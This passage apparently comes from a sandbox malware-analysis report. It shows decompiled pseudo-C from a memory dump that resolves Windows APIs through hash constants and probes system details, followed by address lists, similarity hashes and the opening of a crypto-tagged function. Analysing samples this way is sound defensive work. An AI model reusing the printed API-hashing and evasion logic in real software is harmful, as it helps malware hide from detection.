					_t416 = _t429 + 0x48;
					E6E2E3670(_t416, 0, 0x11c);
					_t430 = _t429 + 0xc;
					 *((intOrPtr*)(_t430 + 0x48)) = 0x11c;
					if(E6E2E3044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t416);
						asm("int3");
						asm("int3");
					}
					_t405 =  *0x6e2ed1f8;
					_t159 = _t430 + 0x4c;
					_t295 =  *_t159;
					 *(_t405 + 8) = _t295;
					_t296 = _t159[4];
					 *(_t405 + 9) = _t296;
					 *((char*)(_t405 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t405 + 4)) =  *((intOrPtr*)(_t430 + 0x54));
					 *((char*)(_t405 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t405 = (_t296 & 0x000000ff) + ((_t295 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E2E101C(_t405);
					 *((intOrPtr*)(_t430 + 0x198)) = 0;
					 *((char*)( *0x6e2ed1f8 + 0xb)) = _t162;
					_t364 = E6E2E3044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t364 == 0) {
						L12:
						_t365 = 0;
						L13:
						 *((char*)( *0x6e2ed1f8 + 0x28)) = _t365;
						if( *((intOrPtr*)(E6E2E0754(0))) >= 0x10) {
							_push(6);
							memcpy(_t430 + 0x164, 0x6e2ebce0, 0 << 2);
							_t430 = _t430 + 0xc;
							 *((intOrPtr*)(_t430 + 0x1c)) = 0;
							E6E2DF5A8(_t430 + 0x24, 0);
							_t407 = 0;
							__eflags = 0;
							do {
								E6E2DF84C(_t430 + 0x24, E6E2DF4F0(_t430 + 0x20) + 4);
								 *((intOrPtr*)(E6E2DF4E0(_t430 + 0x24, E6E2DF4F0(_t430 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t430 + 0x164 + _t407 * 4));
								_t407 = _t407 + 1;
								 *((intOrPtr*)(_t430 + 0x1c)) =  *((intOrPtr*)(_t430 + 0x1c)) + 1;
								__eflags = _t407 - 6;
							} while (_t407 < 6);
							_push(0);
							E6E2E5558(_t430 + 0xc, _t430 + 0x1c, 0x80000002);
							E6E2DF678(_t430 + 0x20);
							E6E2E5588(_t430 + 8, _t430 + 0x1c0, 0x5e9822cf);
							_t180 = E6E2E583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c0)));
							_t408 = _t180;
							E6E2DDFDC(_t430 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E2E5588(_t430 + 8, _t430 + 0x1c8, 0x80c4a2b7);
								_t421 = E6E2E583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c8)));
								E6E2DDFDC(_t430 + 0x1c8);
								_t408 = _t430 + 0x1d0;
								E6E2E5588(_t430 + 8, _t430 + 0x1d0, 0xa89c042f);
								_t402 = E6E2E583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1d0)));
								E6E2DDFDC(_t430 + 0x1d0);
								__eflags = _t421;
								if(_t421 != 0) {
									__eflags = _t421 - 5;
									if(_t421 != 5) {
										__eflags = _t421 - 2;
										if(_t421 != 2) {
											L58:
											E6E2DD020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												goto L66;
											}
											_t383 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t383;
											if(_t383 == 0) {
												L61:
												_t239 = 1;
												L63:
												__eflags = _t239;
												if(_t239 == 0) {
													E6E2E5530(_t383);
												}
												goto L65;
											}
											__eflags = _t383 - 0xffffffff;
											if(_t383 != 0xffffffff) {
												_t239 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t402 - 1;
										if(_t402 != 1) {
											goto L58;
										}
										E6E2DD020(_t430 + 0xc);
										__eflags =  *((char*)(_t430 + 8));
										if( *((char*)(_t430 + 8)) == 0) {
											L57:
											 *((intOrPtr*)(_t430 + 4)) = 0;
											_t189 = 5;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(_t430 + 4));
										__eflags = _t384;
										if(_t384 == 0) {
											L53:
											_t242 = 1;
											L55:
											__eflags = _t242;
											if(_t242 == 0) {
												E6E2E5530(_t384);
											}
											goto L57;
										}
										__eflags = _t384 - 0xffffffff;
										if(_t384 != 0xffffffff) {
											_t242 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t402;
									if(_t402 != 0) {
										__eflags = _t402 - 1;
										if(_t402 == 1) {
											E6E2DD020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L121:
												 *((intOrPtr*)(_t430 + 4)) = 0;
												_t189 = 4;
												goto L66;
											}
											_t385 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t385;
											if(_t385 == 0) {
												L117:
												_t245 = 1;
												L119:
												__eflags = _t245;
												if(_t245 == 0) {
													E6E2E5530(_t385);
												}
												goto L121;
											}
											__eflags = _t385 - 0xffffffff;
											if(_t385 != 0xffffffff) {
												_t245 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E2DD020(_t430 + 0xc);
									__eflags =  *((char*)(_t430 + 8));
									if( *((char*)(_t430 + 8)) == 0) {
										L45:
										 *((intOrPtr*)(_t430 + 4)) = 0;
										_t189 = 3;
										goto L66;
									}
									_t386 =  *((intOrPtr*)(_t430 + 4));
									__eflags = _t386;
									if(_t386 == 0) {
										L41:
										_t248 = 1;
										L43:
										__eflags = _t248;
										if(_t248 == 0) {
											E6E2E5530(_t386);
										}
										goto L45;
									}
									__eflags = _t386 - 0xffffffff;
									if(_t386 != 0xffffffff) {
										_t248 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t402;
								if(_t402 != 0) {
									goto L58;
								}
								E6E2DD020(_t430 + 0xc);
								__eflags =  *((char*)(_t430 + 8));
								if( *((char*)(_t430 + 8)) == 0) {
									L35:
									 *((intOrPtr*)(_t430 + 4)) = 0;
									_t189 = 2;
									goto L66;
								}
								_t387 =  *((intOrPtr*)(_t430 + 4));
								__eflags = _t387;
								if(_t387 == 0) {
									L31:
									_t251 = 1;
									L33:
									__eflags = _t251;
									if(_t251 == 0) {
										E6E2E5530(_t387);
									}
									goto L35;
								}
								__eflags = _t387 - 0xffffffff;
								if(_t387 != 0xffffffff) {
									_t251 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E2DD020(_t430 + 0xc);
							__eflags =  *((char*)(_t430 + 8));
							if( *((char*)(_t430 + 8)) == 0) {
								L25:
								 *((intOrPtr*)(_t430 + 4)) = 0;
								_t189 = 1;
								goto L66;
							}
							_t388 =  *((intOrPtr*)(_t430 + 4));
							__eflags = _t388;
							if(_t388 == 0) {
								L21:
								_t255 = 1;
								L23:
								__eflags = _t255;
								if(_t255 == 0) {
									E6E2E5530(_t388);
								}
								goto L25;
							}
							__eflags = _t388 - 0xffffffff;
							if(_t388 != 0xffffffff) {
								_t255 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e2ed1f8 + 0x24)) = _t189;
							_t190 = E6E2E1054(0xffffffffffffffff);
							_t321 =  *0x6e2ed1f8;
							 *((char*)(_t321 + 0x29)) = _t190;
							 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t321 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e2ed1f8 + 0x2c)) = E6E2E10C8(0xffffffffffffffff);
								L78:
								_t370 = E6E2E3044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
								if(_t370 != 0) {
									 *_t370(_t430 + 0x164);
								}
								_t196 =  *0x6e2ed1f8;
								_t292 = _t430 + 0x178;
								_t410 = _t430 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t292;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t292 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t292 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t410;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t410 + 0x10));
								return _t196;
							}
							 *((intOrPtr*)(_t430 + 0x19c)) = 0;
							_t373 = E6E2E3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t373 == 0) {
								L74:
								_t201 =  *0x6e2ed1f8;
								if( *((char*)(_t201 + 0x28)) == 0) {
									 *((intOrPtr*)(_t201 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t201 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t430 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t373() == 0) {
								_t204 = E6E2E35C8(_t408);
								__eflags = _t204;
								if(_t204 != 0) {
									goto L74;
								}
							}
							 *((intOrPtr*)(_t430 + 0x30)) =  *((intOrPtr*)(_t430 + 0x19c));
							 *((char*)(_t430 + 0x34)) = 1;
							 *((intOrPtr*)(_t430 + 0x1a4)) = 0;
							_t326 = E6E2E3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t326 != 0) {
								_push(_t430 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *((intOrPtr*)(_t430 + 0x1ac)));
								if( *_t326() == 0) {
									E6E2E35C8(_t408);
								}
							}
							_t207 =  *((intOrPtr*)(_t430 + 0x1a4));
							if( *((intOrPtr*)(_t430 + 0x1a4)) != 0) {
								E6E2DF5A8(_t430 + 0x18c, _t207);
								_t412 = E6E2E3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t412;
								if(_t412 == 0) {
									L133:
									E6E2DF678(_t430 + 0x188);
									goto L72;
								}
								_t213 = E6E2DF4E0(_t430 + 0x18c, 0);
								_t214 = E6E2DF4F0(_t430 + 0x188);
								_t216 =  *_t412( *((intOrPtr*)(_t430 + 0x1ac)), 1, _t213, _t214, _t430 + 0x1a4);
								__eflags = _t216;
								if(_t216 == 0) {
									_t217 = E6E2E35C8(_t412);
									__eflags = _t217;
									if(_t217 != 0) {
										goto L133;
									}
								}
								_t424 = E6E2DF4E0(_t430 + 0x18c, 0);
								E6E2DDF84(_t430 + 0x1b4, 0);
								 *((intOrPtr*)(_t430 + 0x1ac)) = 0;
								_t378 = E6E2E3044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t378;
								if(_t378 != 0) {
									 *_t378( *_t424, _t430 + 0x1ac);
								}
								E6E2DDFF8(_t430 + 0x1b4,  *((intOrPtr*)(_t430 + 0x1ac)));
								_t224 = E6E2E3044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t224;
								if(_t224 != 0) {
									_push( *((intOrPtr*)(_t430 + 0x1ac)));
									asm("int3");
									asm("int3");
								}
								E6E2DE0A4(_t430 + 0x1b8 - 8, _t430 + 0x1b8);
								_t426 = E6E2E4FD4( *((intOrPtr*)(_t430 + 0x1b8)), E6E2DE8D4( *((intOrPtr*)(_t430 + 0x1b8)), 0x7fffffff));
								E6E2DDFDC(_t430 + 0x1b8);
								E6E2DDFDC(_t430 + 0x1b0);
								E6E2DF678(_t430 + 0x188);
								__eflags =  *((char*)(_t430 + 0x34));
								if( *((char*)(_t430 + 0x34)) != 0) {
									E6E2DBB88(_t430 + 0x30);
								}
								__eflags = _t426 - 0x6df4cf7;
								if(_t426 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e2ed1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t430 + 0x34)) != 0) {
									E6E2DBB88(_t430 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t430 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t364() == 0) {
						_t260 = E6E2E35C8(_t405);
						__eflags = _t260;
						if(_t260 != 0) {
							goto L12;
						}
					}
					 *((intOrPtr*)(_t430 + 0x14)) =  *((intOrPtr*)(_t430 + 0x198));
					 *((char*)(_t430 + 0x18)) = 1;
					 *((intOrPtr*)(_t430 + 0x1a0)) = 0;
					_t348 = E6E2E3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
					if(_t348 != 0) {
						_push(_t430 + 0x1a0);
						_push(0);
						_push(0);
						_push(2);
						_push( *((intOrPtr*)(_t430 + 0x1a8)));
						if( *_t348() == 0) {
							E6E2E35C8(_t405);
						}
					}
					_t263 =  *((intOrPtr*)(_t430 + 0x1a0));
					if( *((intOrPtr*)(_t430 + 0x1a0)) != 0) {
						E6E2DF5A8(_t430 + 0x3c, _t263);
						_t408 = E6E2E3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							L107:
							E6E2DF678(_t430 + 0x38);
							goto L10;
						}
						_t269 = E6E2DF4E0(_t430 + 0x3c, 0);
						_t270 = E6E2DF4F0(_t430 + 0x38);
						_t272 =  *_t408( *((intOrPtr*)(_t430 + 0x1a8)), 2, _t269, _t270, _t430 + 0x1a0);
						__eflags = _t272;
						if(_t272 == 0) {
							_t273 = E6E2E35C8(_t408);
							__eflags = _t273;
							if(_t273 != 0) {
								goto L107;
							}
						}
						_t428 = E6E2DF4E0(_t430 + 0x3c, 0);
						 *((intOrPtr*)(_t430 + 0x1d8 - 0x30)) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t408 = E6E2E3044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t408;
						if(_t408 == 0) {
							goto L107;
						}
						_t277 = _t430 + 0x1a8;
						_t278 =  *_t408(_t277 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t277);
						__eflags = _t278;
						if(_t278 == 0) {
							_t279 = E6E2E35C8(_t408);
							__eflags = _t279;
							if(_t279 != 0) {
								goto L107;
							}
						}
						_t404 =  *((intOrPtr*)(_t430 + 0x1a8));
						__eflags =  *_t428;
						if( *_t428 <= 0) {
							L101:
							__eflags = _t404;
							if(_t404 == 0) {
								L103:
								_t394 = 1;
								L105:
								__eflags = _t394;
								if(_t394 == 0) {
									E6E2E0FF8(_t404, _t408, _t404);
								}
								goto L107;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t394 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t414 = 0;
						__eflags = 0;
						do {
							_t283 = E6E2E3044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t428 + 4 + _t414 * 8)));
							_push( *((intOrPtr*)(_t430 + 0x1ac)));
							asm("int3");
							asm("int3");
							__eflags = _t283;
							if(_t283 == 0) {
								goto L100;
							}
							__eflags = _t404;
							if(_t404 == 0) {
								L93:
								_t396 = 1;
								L95:
								__eflags = _t396;
								if(_t396 == 0) {
									E6E2E0FF8(_t404, _t414, _t404);
								}
								E6E2DF678(_t430 + 0x38);
								__eflags =  *((char*)(_t430 + 0x18));
								if( *((char*)(_t430 + 0x18)) != 0) {
									E6E2DBB88(_t430 + 0x14);
								}
								_t365 = 1;
								goto L13;
							}
							__eflags = _t404 - 0xffffffff;
							if(_t404 != 0xffffffff) {
								_t396 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t414 = _t414 + 1;
							__eflags = _t414 -  *_t428;
						} while (_t414 <  *_t428);
						goto L101;
					}
					L10:
					if( *((char*)(_t430 + 0x18)) != 0) {
						E6E2DBB88(_t430 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e2e0763
0x6e2e0765
0x6e2e076c
0x6e2e0feb
0x6e2e0ff1
0x6e2e0ff1
0x6e2e0776
0x6e2e0782
0x6e2e078e
0x6e2e0793
0x6e2e07a0
0x6e2e07b1
0x6e2e07b3
0x6e2e07b4
0x6e2e07b5
0x6e2e07b5
0x6e2e07b6
0x6e2e07ba
0x6e2e07be
0x6e2e07c3
0x6e2e07c6
0x6e2e07cc
0x6e2e07e6
0x6e2e07ed
0x6e2e07f0
0x6e2e07f3
0x6e2e07f5
0x6e2e0801
0x6e2e080e
0x6e2e081b
0x6e2e081f
0x6e2e08ab
0x6e2e08ab
0x6e2e08ad
0x6e2e08b1
0x6e2e08bc
0x6e2e08d2
0x6e2e08d5
0x6e2e08d5
0x6e2e08d9
0x6e2e08e2
0x6e2e08e7
0x6e2e08e7
0x6e2e08e9
0x6e2e08fa
0x6e2e091c
0x6e2e091e
0x6e2e091f
0x6e2e0923
0x6e2e0923
0x6e2e092c
0x6e2e0938
0x6e2e0941
0x6e2e0957
0x6e2e0967
0x6e2e096c
0x6e2e0970
0x6e2e0975
0x6e2e0977
0x6e2e09c7
0x6e2e09dc
0x6e2e09e0
0x6e2e09e5
0x6e2e09f6
0x6e2e0a0b
0x6e2e0a0f
0x6e2e0a14
0x6e2e0a16
0x6e2e0a5d
0x6e2e0a60
0x6e2e0aae
0x6e2e0ab1
0x6e2e0af2
0x6e2e0af6
0x6e2e0afb
0x6e2e0b00
0x6e2e0b1f
0x6e2e0b1f
0x6e2e0b1f
0x6e2e0b21
0x00000000
0x6e2e0b21
0x6e2e0b02
0x6e2e0b06
0x6e2e0b08
0x6e2e0b0f
0x6e2e0b0f
0x6e2e0b15
0x6e2e0b15
0x6e2e0b17
0x6e2e0b1a
0x6e2e0b1a
0x00000000
0x6e2e0b17
0x6e2e0b0a
0x6e2e0b0d
0x6e2e0b13
0x6e2e0b13
0x00000000
0x6e2e0b13
0x00000000
0x6e2e0b0d
0x6e2e0ab3
0x6e2e0ab6
0x00000000
0x00000000
0x6e2e0abc
0x6e2e0ac1
0x6e2e0ac6
0x6e2e0ae5
0x6e2e0ae5
0x6e2e0aef
0x00000000
0x6e2e0aef
0x6e2e0ac8
0x6e2e0acc
0x6e2e0ace
0x6e2e0ad5
0x6e2e0ad5
0x6e2e0adb
0x6e2e0adb
0x6e2e0add
0x6e2e0ae0
0x6e2e0ae0
0x00000000
0x6e2e0add
0x6e2e0ad0
0x6e2e0ad3
0x6e2e0ad9
0x6e2e0ad9
0x00000000
0x6e2e0ad9
0x00000000
0x6e2e0ad3
0x6e2e0a62
0x6e2e0a64
0x6e2e0aa3
0x6e2e0aa6
0x6e2e0e18
0x6e2e0e1d
0x6e2e0e22
0x6e2e0e41
0x6e2e0e41
0x6e2e0e4b
0x00000000
0x6e2e0e4b
0x6e2e0e24
0x6e2e0e28
0x6e2e0e2a
0x6e2e0e31
0x6e2e0e31
0x6e2e0e37
0x6e2e0e37
0x6e2e0e39
0x6e2e0e3c
0x6e2e0e3c
0x00000000
0x6e2e0e39
0x6e2e0e2c
0x6e2e0e2f
0x6e2e0e35
0x6e2e0e35
0x00000000
0x6e2e0e35
0x00000000
0x6e2e0e2f
0x00000000
0x6e2e0aac
0x6e2e0a6a
0x6e2e0a6f
0x6e2e0a74
0x6e2e0a93
0x6e2e0a93
0x6e2e0a9d
0x00000000
0x6e2e0a9d
0x6e2e0a76
0x6e2e0a7a
0x6e2e0a7c
0x6e2e0a83
0x6e2e0a83
0x6e2e0a89
0x6e2e0a89
0x6e2e0a8b
0x6e2e0a8e
0x6e2e0a8e
0x00000000
0x6e2e0a8b
0x6e2e0a7e
0x6e2e0a81
0x6e2e0a87
0x6e2e0a87
0x00000000
0x6e2e0a87
0x00000000
0x6e2e0a81
0x6e2e0a18
0x6e2e0a1a
0x00000000
0x00000000
0x6e2e0a24
0x6e2e0a29
0x6e2e0a2e
0x6e2e0a4d
0x6e2e0a4d
0x6e2e0a57
0x00000000
0x6e2e0a57
0x6e2e0a30
0x6e2e0a34
0x6e2e0a36
0x6e2e0a3d
0x6e2e0a3d
0x6e2e0a43
0x6e2e0a43
0x6e2e0a45
0x6e2e0a48
0x6e2e0a48
0x00000000
0x6e2e0a45
0x6e2e0a38
0x6e2e0a3b
0x6e2e0a41
0x6e2e0a41
0x00000000
0x6e2e0a41
0x00000000
0x6e2e0a3b
0x6e2e097d
0x6e2e0982
0x6e2e0987
0x6e2e09a6
0x6e2e09a6
0x6e2e09b0
0x00000000
0x6e2e09b0
0x6e2e0989
0x6e2e098d
0x6e2e098f
0x6e2e0996
0x6e2e0996
0x6e2e099c
0x6e2e099c
0x6e2e099e
0x6e2e09a1
0x6e2e09a1
0x00000000
0x6e2e099e
0x6e2e0991
0x6e2e0994
0x6e2e099a
0x6e2e099a
0x00000000
0x6e2e099a
0x00000000
0x6e2e08be
0x6e2e08c0
0x6e2e0b25
0x6e2e0b2a
0x6e2e0b2d
0x6e2e0b32
0x6e2e0b34
0x6e2e0b49
0x6e2e0b4c
0x6e2e0c1a
0x6e2e0c22
0x6e2e0c25
0x6e2e0c36
0x6e2e0c3a
0x6e2e0c44
0x6e2e0c44
0x6e2e0c46
0x6e2e0c48
0x6e2e0c57
0x6e2e0c63
0x6e2e0c67
0x6e2e0c6a
0x6e2e0c6d
0x6e2e0c70
0x00000000
0x6e2e0c70
0x6e2e0b5c
0x6e2e0b6e
0x6e2e0b72
0x6e2e0bfe
0x6e2e0bfe
0x6e2e0c04
0x6e2e0c0f
0x6e2e0c06
0x6e2e0c06
0x6e2e0c06
0x00000000
0x6e2e0c04
0x6e2e0b7f
0x6e2e0b80
0x6e2e0b82
0x6e2e0b88
0x6e2e0fd7
0x6e2e0fdc
0x6e2e0fde
0x00000000
0x00000000
0x6e2e0fe4
0x6e2e0b9f
0x6e2e0ba3
0x6e2e0ba8
0x6e2e0bba
0x6e2e0bbe
0x6e2e0bc9
0x6e2e0bca
0x6e2e0bcb
0x6e2e0bcc
0x6e2e0bce
0x6e2e0bd9
0x6e2e0e51
0x6e2e0e51
0x6e2e0bd9
0x6e2e0bdf
0x6e2e0be8
0x6e2e0e63
0x6e2e0e79
0x6e2e0e7b
0x6e2e0e7d
0x6e2e0fb8
0x6e2e0fbf
0x00000000
0x6e2e0fbf
0x6e2e0e8c
0x6e2e0e9a
0x6e2e0eb4
0x6e2e0eb6
0x6e2e0eb8
0x6e2e0fc9
0x6e2e0fce
0x6e2e0fd0
0x00000000
0x00000000
0x6e2e0fd2
0x6e2e0ecc
0x6e2e0ed7
0x6e2e0ee6
0x6e2e0ef8
0x6e2e0efa
0x6e2e0efc
0x6e2e0f09
0x6e2e0f09
0x6e2e0f19
0x6e2e0f2a
0x6e2e0f2f
0x6e2e0f31
0x6e2e0f33
0x6e2e0f3a
0x6e2e0f3b
0x6e2e0f3b
0x6e2e0f47
0x6e2e0f68
0x6e2e0f71
0x6e2e0f7d
0x6e2e0f89
0x6e2e0f8e
0x6e2e0f93
0x6e2e0f99
0x6e2e0f99
0x6e2e0f9e
0x6e2e0fa4
0x00000000
0x6e2e0faa
0x6e2e0fac
0x00000000
0x6e2e0fac
0x6e2e0bee
0x6e2e0bee
0x6e2e0bf3
0x6e2e0bf9
0x6e2e0bf9
0x00000000
0x6e2e0bf3
0x6e2e0be8
0x6e2e08bc
0x6e2e082c
0x6e2e082d
0x6e2e082f
0x6e2e0835
0x6e2e0e02
0x6e2e0e07
0x6e2e0e09
0x00000000
0x00000000
0x6e2e0e0f
0x6e2e084c
0x6e2e0850
0x6e2e0855
0x6e2e0867
0x6e2e086b
0x6e2e0876
0x6e2e0877
0x6e2e0878
0x6e2e0879
0x6e2e087b
0x6e2e0886
0x6e2e0c7e
0x6e2e0c7e
0x6e2e0886
0x6e2e088c
0x6e2e0895
0x6e2e0c8d
0x6e2e0ca3
0x6e2e0ca5
0x6e2e0ca7
0x6e2e0dd8
0x6e2e0ddc
0x00000000
0x6e2e0ddc
0x6e2e0cb3
0x6e2e0cbe
0x6e2e0cd8
0x6e2e0cda
0x6e2e0cdc
0x6e2e0df4
0x6e2e0df9
0x6e2e0dfb
0x00000000
0x00000000
0x6e2e0dfd
0x6e2e0ced
0x6e2e0cfb
0x6e2e0d02
0x6e2e0d03
0x6e2e0d04
0x6e2e0d16
0x6e2e0d18
0x6e2e0d1a
0x00000000
0x00000000
0x6e2e0d22
0x6e2e0d3d
0x6e2e0d3f
0x6e2e0d41
0x6e2e0de6
0x6e2e0deb
0x6e2e0ded
0x00000000
0x00000000
0x6e2e0def
0x6e2e0d47
0x6e2e0d4e
0x6e2e0d52
0x6e2e0dbd
0x6e2e0dbd
0x6e2e0dbf
0x6e2e0dc6
0x6e2e0dc6
0x6e2e0dcc
0x6e2e0dcc
0x6e2e0dce
0x6e2e0dd3
0x6e2e0dd3
0x00000000
0x6e2e0dce
0x6e2e0dc1
0x6e2e0dc4
0x6e2e0dca
0x6e2e0dca
0x00000000
0x6e2e0dca
0x00000000
0x6e2e0dc4
0x6e2e0d54
0x6e2e0d54
0x6e2e0d56
0x6e2e0d62
0x6e2e0d67
0x6e2e0d69
0x00000000
0x00000000
0x6e2e0d6b
0x6e2e0d6f
0x6e2e0d76
0x6e2e0d77
0x6e2e0d78
0x6e2e0d7a
0x00000000
0x00000000
0x6e2e0d7c
0x6e2e0d7e
0x6e2e0d85
0x6e2e0d85
0x6e2e0d8b
0x6e2e0d8b
0x6e2e0d8d
0x6e2e0d92
0x6e2e0d92
0x6e2e0d9b
0x6e2e0da0
0x6e2e0da5
0x6e2e0dab
0x6e2e0dab
0x6e2e0db0
0x00000000
0x6e2e0db0
0x6e2e0d80
0x6e2e0d83
0x6e2e0d89
0x6e2e0d89
0x00000000
0x6e2e0d89
0x00000000
0x6e2e0db7
0x6e2e0db7
0x6e2e0db8
0x6e2e0db8
0x00000000
0x6e2e0d56
0x6e2e089b
0x6e2e08a0
0x6e2e08a6
0x6e2e08a6
0x00000000
0x6e2e0c7d
0x6e2e0c7d
0x6e2e0c7d

Strings

J}*, xrefs: 6E2E0D5B

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: J}*
API String ID: 0-3566034359
Opcode ID: bd0946e79c82aac03892108a362913b6adbe623ce8b072a7963a5b3c24803955
Instruction ID: 876c5847e360f71ce1cbefb28293f9450277d69d4a8a2a7192ea083ce382b4d4
Opcode Fuzzy Hash: bd0946e79c82aac03892108a362913b6adbe623ce8b072a7963a5b3c24803955
Instruction Fuzzy Hash: 2E22293420835E9FE760CBA4C850FEB77ABAF81319F90891CE59597A94EF70D806C752

Uniqueness

Uniqueness Score: -1.00%

Function 6E2D1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E2D1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E2DF5A8( &_v72, 0);
				_v60 = 0x790529cb;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v76, E6E2DF4F0( &_v76) + 0x10);
				E6E2DF4E0( &_v80, E6E2DF4F0( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0xdee5e4fb;
				asm("movq [ecx+0x18], xmm0");
				E6E2DF84C( &_v84, E6E2DF4F0(_t325) + 0x10);
				E6E2DF4E0( &_v88, E6E2DF4F0( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xeabbe5b1;
				asm("movq [ecx+0x18], xmm0");
